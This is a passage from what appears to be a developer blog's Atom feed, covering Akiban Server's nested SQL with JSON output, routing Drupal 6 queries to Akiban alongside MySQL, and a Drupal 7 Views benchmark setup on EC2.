&lt;span class='nb'&gt;test&lt;/span&gt;-&amp;gt;   &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;salary_history.* from salary_history where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; salary_history.emp_no&lt;span class='o'&gt;)&lt;/span&gt; 
&lt;span class='nb'&gt;test&lt;/span&gt;-&amp;gt; from 
&lt;span class='nb'&gt;test&lt;/span&gt;-&amp;gt;   employees;
                                                                                                                                                                                                                                                                                                                                         JSON                                                                                                                                                                                                                                                                                                                                          
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 &lt;span class='o'&gt;{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;name&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;IGNATIES&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1970-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;_SQL_COL_1&amp;quot;&lt;/span&gt;:&lt;span class='o'&gt;[{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;child_name&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;INIGA&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;2001-01-01&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}&lt;/span&gt;,&lt;span class='o'&gt;{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;child_name&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;INIGO&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;2001-01-01&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}]&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;_SQL_COL_2&amp;quot;&lt;/span&gt;:&lt;span class='o'&gt;[{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1991-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;title&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;PROGRAMMER&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}&lt;/span&gt;,&lt;span class='o'&gt;{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;title&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;DATABASE ADMIN&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}]&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;_SQL_COL_3&amp;quot;&lt;/span&gt;:&lt;span class='o'&gt;[{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1991-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1991-01-02&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1000&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}&lt;/span&gt;,&lt;span class='o'&gt;{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1991-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1991-01-03&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1000&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}&lt;/span&gt;,&lt;span class='o'&gt;{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;:&lt;span 
class='s2'&gt;&amp;quot;1992-01-02&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;2000&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}&lt;/span&gt;,&lt;span class='o'&gt;{&lt;/span&gt;&lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;:1,&lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;1992-01-03&amp;quot;&lt;/span&gt;,&lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;:&lt;span class='s2'&gt;&amp;quot;2000&amp;quot;&lt;/span&gt;&lt;span class='o'&gt;}]}&lt;/span&gt;
&lt;span class='o'&gt;(&lt;/span&gt;1 row&lt;span class='o'&gt;)&lt;/span&gt;

Time: 12.230 ms
&lt;span class='nb'&gt;test&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you scroll to the right above, you will see the nested result set with all of the information for employee 1. Also notice that we have an easy way to enable or disable nested result set functionality: setting the format back to &amp;#8216;table&amp;#8217; results in tabular output. The result set above, nicely formatted, is shown next.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='o'&gt;{&lt;/span&gt;
    &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
    &lt;span class='s2'&gt;&amp;quot;name&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;IGNATIES&amp;quot;&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1970-01-01&amp;quot;&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;_SQL_COL_1&amp;quot;&lt;/span&gt;: &lt;span class='o'&gt;[&lt;/span&gt;
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;child_name&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;INIGA&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2001-01-01&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;,
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;child_name&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;INIGO&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2001-01-01&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;
    &lt;span class='o'&gt;]&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;_SQL_COL_2&amp;quot;&lt;/span&gt;: &lt;span class='o'&gt;[&lt;/span&gt;
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1991-01-01&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;title&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;PROGRAMMER&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;,
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;title&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;DATABASE ADMIN&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;
    &lt;span class='o'&gt;]&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;_SQL_COL_3&amp;quot;&lt;/span&gt;: &lt;span class='o'&gt;[&lt;/span&gt;
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1991-01-01&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1991-01-02&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1000&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;,
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1991-01-01&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1991-01-03&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1000&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;,
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1992-01-02&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2000&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;,
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1992-01-03&amp;quot;&lt;/span&gt;,
            &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2000&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;
    &lt;span class='o'&gt;]&lt;/span&gt;
&lt;span class='o'&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
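&lt;p&gt;Switching back to tabular output is just the mirror of the earlier command:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;test=&amp;gt; set OutputFormat = &amp;#39;table&amp;#39;;
SET OutputFormat
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;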
&lt;p&gt;Now there is no reason we could not write an XML outputter in the future. JSON is what we have gone with for now because we all like JSON here, and a few of us are not such big fans of XML.&lt;/p&gt;

&lt;p&gt;Since this is nested SQL, I can select just what I want and filter the result set using predicates. Let&amp;#8217;s say I only want the birth dates of children named &amp;#8216;INIGA&amp;#8217;, plus salary history and job information for the &amp;#8216;DATABASE ADMIN&amp;#8217; role. I can also give aliases to anything in my &lt;code&gt;SELECT&lt;/code&gt; clause.&lt;/p&gt;

&lt;p&gt;I could write a query like the following:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='k'&gt;select &lt;/span&gt;
&lt;span class='k'&gt;  &lt;/span&gt;employees.*,
  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;children.birth_date from children where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; children.emp_no and &lt;span class='nv'&gt;child_name&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;INIGA&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt; as children, 
  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;job_history.job_date from job_history where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; job_history.emp_no and &lt;span class='nv'&gt;title&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;DATABASE ADMIN&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt; as job, 
  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='k'&gt;select &lt;/span&gt;salary_history.salary from salary_history where employees.emp_no &lt;span class='o'&gt;=&lt;/span&gt; salary_history.emp_no and &lt;span class='nv'&gt;job_date&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;1992-01-01&amp;#39;&lt;/span&gt;&lt;span class='o'&gt;)&lt;/span&gt; as salary
from 
  employees
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above query would return a result set like (after formatting):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='o'&gt;{&lt;/span&gt;
    &lt;span class='s2'&gt;&amp;quot;emp_no&amp;quot;&lt;/span&gt;: 1,
    &lt;span class='s2'&gt;&amp;quot;name&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;IGNATIES&amp;quot;&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1970-01-01&amp;quot;&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;children&amp;quot;&lt;/span&gt;: &lt;span class='o'&gt;[&lt;/span&gt;
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;birth_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2001-01-01&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;
    &lt;span class='o'&gt;]&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;job&amp;quot;&lt;/span&gt;: &lt;span class='o'&gt;[&lt;/span&gt;
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;job_date&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;1992-01-01&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;
    &lt;span class='o'&gt;]&lt;/span&gt;,
    &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='o'&gt;[&lt;/span&gt;
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2000&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;,
        &lt;span class='o'&gt;{&lt;/span&gt;
            &lt;span class='s2'&gt;&amp;quot;salary&amp;quot;&lt;/span&gt;: &lt;span class='s2'&gt;&amp;quot;2000&amp;quot;&lt;/span&gt;
        &lt;span class='o'&gt;}&lt;/span&gt;
    &lt;span class='o'&gt;]&lt;/span&gt;
&lt;span class='o'&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That&amp;#8217;s all I wanted to touch on in this post, but I aim to write a separate post comparing table grouping with Oracle multi-table clusters in the future. In the meantime, we do have a short piece of text discussing the &lt;a href='http://akiban.zendesk.com/entries/20779441-how-does-table-grouping-compare-to-oracle-cluster-tables'&gt;difference&lt;/a&gt; on our Zendesk portal.&lt;/p&gt;

&lt;p&gt;Our nested SQL &lt;a href='http://www.akiban.com/ak-docs/nested.html'&gt;quickstart guide&lt;/a&gt; also has examples of this functionality if you are interested in seeing more. In that quick-start, we use the employees sample database from MySQL.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Using Akiban Server with Drupal 6</title>
   <link href="http://posulliv.github.com/2012/05/18/drupal-6-akiban"/>
   <updated>2012-05-18T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/05/18/drupal-6-akiban</id>
   <content type="html">&lt;p&gt;In my &lt;a href='http://posulliv.github.com/2012/05/14/drupal-akiban.html'&gt;previous post&lt;/a&gt;, I mentioned I&amp;#8217;m working on a database driver for Drupal 7 for the Akiban Server. However, we have some clients who use Drupal 6 so I wanted to talk about how we work with those clients in this post.&lt;/p&gt;

&lt;p&gt;Drupal 6 does not have the database abstraction layer that Drupal 7 introduced, so it is not as easy to integrate Akiban in this case. With Drupal 6, we do not attempt to run all of Drupal on Akiban. What we have done with our existing customers who use Drupal 6 is to send certain problem queries to Akiban (running in our MySQL replication configuration) and everything else to MySQL. The Akiban Server speaks the PostgreSQL protocol as I discussed &lt;a href='http://www.akiban.com/blog/2011/08/29/typical-akiban-deployment'&gt;before&lt;/a&gt;. Hence, for Drupal 6, we use the PostgreSQL database driver to talk to Akiban.&lt;/p&gt;

&lt;p&gt;Since Drupal 6 does not support speaking to multiple different database backends at the same time, we apply a &lt;a href='https://gist.github.com/2710166'&gt;patch&lt;/a&gt; to get started. Basically, this patch allows connections to be open to both an existing MySQL server and the Akiban Server at the same time. It could be used to do the same with a PostgreSQL database as well.&lt;/p&gt;

&lt;p&gt;Once that patch is applied, to send a query to Akiban, the active database connection is set to Akiban and a query is fired off for the Akiban Server to execute. The following code snippet shows an example.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;&lt;span class='x'&gt;$result = FALSE; /* fall through to MySQL below if Akiban is not used */&lt;/span&gt;
&lt;span class='x'&gt;if ($this-&amp;gt;use_akiban) {&lt;/span&gt;
&lt;span class='x'&gt;   db_set_active(&amp;#39;akiban&amp;#39;);&lt;/span&gt;
&lt;span class='x'&gt;   $result = db_query_range($query, &lt;/span&gt;
&lt;span class='x'&gt;                            $args, &lt;/span&gt;
&lt;span class='x'&gt;                            $offset, &lt;/span&gt;
&lt;span class='x'&gt;                            $this-&amp;gt;pager[&amp;#39;items_per_page&amp;#39;]);&lt;/span&gt;
&lt;span class='x'&gt;}&lt;/span&gt;
&lt;span class='x'&gt;db_set_active(&amp;#39;default&amp;#39;);&lt;/span&gt;
&lt;span class='x'&gt;if (! $result) { /* if Akiban failed go to regular MySQL */&lt;/span&gt;
&lt;span class='x'&gt;   $result = db_query_range($query, &lt;/span&gt;
&lt;span class='x'&gt;                            $args, &lt;/span&gt;
&lt;span class='x'&gt;                            $offset, &lt;/span&gt;
&lt;span class='x'&gt;                            $this-&amp;gt;pager[&amp;#39;items_per_page&amp;#39;]);&lt;/span&gt;
&lt;span class='x'&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As can be seen in the code above, it&amp;#8217;s also possible to detect that the query failed against Akiban and re-issue it against MySQL.&lt;/p&gt;

&lt;p&gt;When deployed in this configuration, connection details for the Akiban Server are specified in the &lt;code&gt;settings.php&lt;/code&gt; file for a Drupal site:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;&lt;span class='x'&gt;$db_url = array(&lt;/span&gt;
&lt;span class='x'&gt;  &amp;quot;default&amp;quot; =&amp;gt; &amp;quot;mysql://drupal:drupal@mysql_hostname/drupal_schema&amp;quot;,&lt;/span&gt;
&lt;span class='x'&gt;  &amp;quot;akiban&amp;quot;  =&amp;gt; &amp;quot;pgsql://drupal:drupal@akiban_hostname:15432/drupal_schema&amp;quot;&lt;/span&gt;
&lt;span class='x'&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We&amp;#8217;ve also done some work with clients where we have made patches to the Views module for Drupal. These patches allow a client to send the queries generated by a specific view to an Akiban Server; the gist of the approach is sketched below.&lt;/p&gt;
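
&lt;p&gt;The following is a hypothetical sketch of that idea using Views hooks (the module and view names are made up and the real patches are client-specific):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;/* hypothetical module code: route one view&amp;#39;s queries to Akiban */
function mymodule_views_pre_execute(&amp;amp;$view) {
  if ($view-&amp;gt;name == &amp;#39;problem_view&amp;#39;) {
    db_set_active(&amp;#39;akiban&amp;#39;);
  }
}

function mymodule_views_post_execute(&amp;amp;$view) {
  /* switch back so the rest of the request uses MySQL */
  db_set_active(&amp;#39;default&amp;#39;);
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;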

&lt;p&gt;Taken together, this makes it quite easy for us to work with Drupal 6 and send problematic queries to Akiban.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Akiban Server Progress with Drupal 7</title>
   <link href="http://posulliv.github.com/2012/05/14/drupal-akiban"/>
   <updated>2012-05-14T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/05/14/drupal-akiban</id>
   <content type="html">&lt;p&gt;The call for papers for &lt;a href='http://munich2012.drupal.org/'&gt;DrupalCon Munich&lt;/a&gt; closed on Friday and I &lt;a href='http://munich2012.drupal.org/program/sessions/building-new-database-driver-drupal-7'&gt;submitted&lt;/a&gt; a session related to the work I&amp;#8217;m doing on developing a database module for the Akiban Server with Drupal 7. That work has not been open sourced yet but will be before August. We also plan on open sourcing and releasing the Akiban Server for public download by August as well. The end result of this work will be a database driver for the Akiban Server that will allow Drupal 7 to run on Akiban.&lt;/p&gt;

&lt;p&gt;In this post, I wanted to briefly show the type of results I&amp;#8217;ve been seeing from running Drupal on Akiban. To do this, I constructed a simple view using the Views module and benchmarked the query that resulted from this view.&lt;/p&gt;

&lt;h1 id='environment_setup'&gt;Environment Setup&lt;/h1&gt;

&lt;p&gt;All results were gathered on EC2 instances. The base AMI used for these results is an official AMI of Ubuntu 10.04 provided by &lt;a href='http://cloud-images.ubuntu.com/releases/10.04/release'&gt;Canonical&lt;/a&gt;. The particular AMI used as the base image for the results gathered in this post was &lt;a href='https://console.aws.amazon.com/ec2/home?region=us-east-1#launchAmi=ami-0baf7662'&gt;ami-0baf7662&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;All instances were launched in the US-EAST-1A availability zone and were of the large instance type. After launching this base image I installed MySQL 5.6 and Drupal 7.12. The steps I took to install these components along with the &lt;code&gt;my.cnf&lt;/code&gt; file I used for MySQL are outlined in this &lt;a href='https://gist.github.com/2691521'&gt;gist&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;I also created an AMI from the running instance after all the steps outlined were performed. This &lt;a href='https://console.aws.amazon.com/ec2/home?region=us-east-1#launchAmi=ami-2eef4a47'&gt;AMI&lt;/a&gt; has MySQL 5.6 installed along with Drupal 7.12 and data generated with drush.&lt;/p&gt;

&lt;p&gt;The Akiban AMI cannot be made available for general download yet since we have not open-sourced our stack as of this time. Once our stack has been open-sourced I will update this post with a link to an AMI that can be downloaded. However, if you are interested in seeing the results here for yourself, feel free to contact me and I should be able to grant access to an EC2 instance for testing.&lt;/p&gt;

&lt;h2 id='data_generation'&gt;Data Generation&lt;/h2&gt;

&lt;p&gt;I used &lt;a href='http://drupal.org/project/drush'&gt;drush&lt;/a&gt; and the &lt;a href='http://drupal.org/project/devel'&gt;devel&lt;/a&gt; module to generate data for the view to operate on. I generated the following data (a sketch of the drush invocations follows the table):&lt;/p&gt;
&lt;table&gt;
  &lt;tr&gt;
    &lt;td&gt;users&lt;/td&gt;&lt;td&gt;50000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;tags&lt;/td&gt;&lt;td&gt;1000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;vocabularies&lt;/td&gt;&lt;td&gt;5000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;menus&lt;/td&gt;&lt;td&gt;5000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;nodes&lt;/td&gt;&lt;td&gt;100000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;max comments per node&lt;/td&gt;&lt;td&gt;10&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
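&lt;p&gt;The devel module exposes drush commands for this kind of generation; the invocations below are a sketch matching the counts above (exact command names and arguments depend on the devel release):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;drush generate-users 50000
drush generate-vocabs 5000
drush generate-terms tags 1000
drush generate-menus 5000
drush generate-content 100000 10   # 100000 nodes, max 10 comments per node
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;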
&lt;h1 id='view_and_sql_query'&gt;View and SQL Query&lt;/h1&gt;

&lt;p&gt;I created a simple view that filters and sorts on content criteria. A screenshot of my view construction page can be seen &lt;a href='/images/view_screen_shot.png'&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The resulting SQL query that gets executed by this view is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;&lt;span class='k'&gt;SELECT&lt;/span&gt; &lt;span class='k'&gt;DISTINCT&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;title&lt;/span&gt;                            &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;node_title&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
                &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt;                              &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;nid&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
                &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;comment_count&lt;/span&gt; &lt;span class='k'&gt;AS&lt;/span&gt; 
                &lt;span class='n'&gt;node_comment_statistics_comment_count&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
                &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;created&lt;/span&gt;                          &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;node_created&lt;/span&gt; 
&lt;span class='k'&gt;FROM&lt;/span&gt;   &lt;span class='n'&gt;node&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt; 
       &lt;span class='k'&gt;INNER&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt; 
